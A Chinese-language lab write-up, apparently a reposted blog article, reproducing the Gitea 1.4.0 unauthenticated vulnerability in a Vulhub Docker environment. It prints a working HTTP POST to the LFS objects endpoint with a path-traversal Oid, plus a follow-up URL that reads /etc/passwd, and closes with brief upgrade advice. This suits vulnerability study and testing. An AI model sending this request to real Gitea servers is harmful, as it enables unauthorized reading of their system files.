gitea 1.4 未授权远程代码执行漏洞复现

  • A+
所属分类:安全文章

漏洞概要

Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。
 

影响版本

1.4.0

 

环境搭建

 

Vulhub进行搭建

https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce


进入目录cd vulhub-master/gitea/1.4-rce/进行安装docker-compose up -d

gitea 1.4 未授权远程代码执行漏洞复现

 查看状态

端口在3000

gitea 1.4 未授权远程代码执行漏洞复现

访问http://you-ip:3000

设置管理员账号密码,其他默认

gitea 1.4 未授权远程代码执行漏洞复现

安装完成后,新建一个用户,然后创建一个公开的仓库,随便添加点文件进去

gitea 1.4 未授权远程代码执行漏洞复现

gitea 1.4 未授权远程代码执行漏洞复现

接着执行一次docker-compose restart重启gitea服务

gitea 1.4 未授权远程代码执行漏洞复现

漏洞复现

 

构建数据包进行发送

POST /admins/test.git/info/lfs/objects HTTP/1.1
Host: 192.168.204.131:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 153


{
"Oid": "....../../../etc/passwd",
"Size": 1000000,
"User" : "a",
"Password" : "a",
"Repo" : "a",
"Authorization" : "a"
}

gitea 1.4 未授权远程代码执行漏洞复现

发送数据包后,虽然返回了401状态码,但实际上这个LFS对象已经创建成功,且其Oid为....../../../etc/passwd。


最后访问

http://your-ip:3000/admins/test.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth

gitea 1.4 未授权远程代码执行漏洞复现

成功读取/etc/passwd

 

修复建议


升级到安全版本




本文始发于微信公众号(锋刃科技):gitea 1.4 未授权远程代码执行漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: